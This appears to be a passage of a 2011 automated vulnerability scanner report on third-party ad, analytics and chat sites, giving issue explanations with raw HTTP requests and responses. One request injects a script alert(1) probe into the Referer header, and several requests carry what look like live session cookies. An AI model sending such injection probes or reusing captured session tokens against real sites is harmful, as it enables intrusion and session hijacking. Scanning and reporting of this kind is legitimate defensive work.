Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:03:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <meta name="copyright" content="<?php echo AT_COPYRIGHT_TEXT ?>" /> ...[SNIP]...
14. Referer-dependent responsepreviousnext There are 6 instances of this issue:
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.
/* * note: this is just here for reference */ var testTypes = { a : 'top.location.href', b : 'parent.location.href', c : 'parent.document.referrer', d : 'window.location.href', e : 'window.document.referrer', f : ...[SNIP]...
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:02 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3174 Content-Type: application/x-javascript
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:57:56 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3192 Content-Type: application/x-javascript
GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1 Host: onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response 1
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:35 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Expires: Sat, 29 Jan 2011 03:49:35 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 28783
var fiChildSAccount="fiwrgb";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /***** ...[SNIP]... op42 + ':' + s.pageName; s.prop44="17:45"; s.eVar6=""; s.hier1="entertainment|root"; s.hier2="events.cbs6albany.com|entertainment|events|events|root"; /** domain=events.cbs6albany.com **/
/** referer=http://events.cbs6albany.com/?376e5%22%3e%3cscript%3ealert(1)%3c/script%3ea7771aeaee3=1 **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code) //if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+ '-')
Request 2
GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1 Host: onset.freedom.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response 2
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:50 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Expires: Sat, 29 Jan 2011 03:49:50 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 28696
var fiChildSAccount="fiwrgb";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /***** ...[SNIP]... op42 + ':' + s.pageName; s.prop44="17:45"; s.eVar6=""; s.hier1="entertainment|root"; s.hier2="events.cbs6albany.com|entertainment|events|events|root"; /** domain=events.cbs6albany.com **/
/** referer= **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code) //if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+ '-')
GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1 Host: www.screenthumbs.com Proxy-Connection: keep-alive Referer: http://www.screenthumbs.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
var linkthumbs_url = 'http://www.screenthumbs.com/thumb?direct=1&appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome&format=0&width=200&height=150&url=';
var linkthumbs_clsNames = ['', 'type2']; var linkthumbs_previewTypes = [0, 1]; var linkthumbs_delays = [0, 0];
var linkthumbs_iconWidth = 16; var linkthumbs_iconHeight = 16; var linkthumbs_iconURL = 'http://www.screenthumbs.com/tools/images/icon4.png';
var linkthumbs_mouseX = 0, linkthumbs_mouseY = 0; var linkthumbs_currentThumbIndex = -1; var linkthumbs_containerTimeout = -1; var linkthumbs_dummyEnabled = false; var linkthumbs_fadeTimeout = -1; var linkthumbs_showThumbTimeout = -1; var linkthumbs_currentOpacity = 0; var linkthumbs_opacityStep = 15;
var linkthumbs_thumb = null; var linkthumbs_container = null; var linkthumbs_dummyThumb = null;
var linkthumbs_iconTimeouts = new Array(); var linkthumbs_thumbs = new Array(); var linkthumbs_icons = Array();
var linkthumbs_dummyThumbURL = ''; var linkthumbs_ie = false;
function linkthumbs_detectIE() { if(navigator && navigator.userAgent) { var userAgent = navigator.userAgent.toLowerCase();
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> ...[SNIP]...
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> ...[SNIP]...
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> ...[SNIP]...
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> ...[SNIP]...
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> ...[SNIP]...
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> ...[SNIP]...
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1 Host: base.liveperson.net Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 28 Jan 2011 14:16:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net Set-Cookie: HumanClickKEY=1417917221691646769; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net Set-Cookie: HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H1417917221691646769-7678006185736106283K15949656 Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:06:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LPit=false; path=/hc/5296924 Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924 Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 893
lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/html; charset=utf-8 Content-Length: 1767 Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/html; charset=utf-8 Content-Length: 1767 Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADy5OcAyjtDTQAAAAAAAAAAAAAAAAAAAABbc0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The response contains the following link to another domain:
http://d3.zedo.com/jsc/d3/fo.js
Request
GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/html; charset=utf-8 Content-Length: 750 P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
GET /adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B%7Esscs%3D%3f;ord=1656403?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1147 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:19:51 GMT Expires: Sat, 29 Jan 2011 05:19:51 GMT Connection: close
GET /adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Fri, 28 Jan 2011 21:57:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6328
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Fri Jan 14 14:04:00 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... 4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http%3a%2f%2ft-mobile-coverage.t-mobile.com/4G-Network-Coverage%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%25208bEpBc"><img src="http://s0.2mdn.net/998766/0328_300x250_Winter_Largest4GNetwork_DataPlan_Static.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
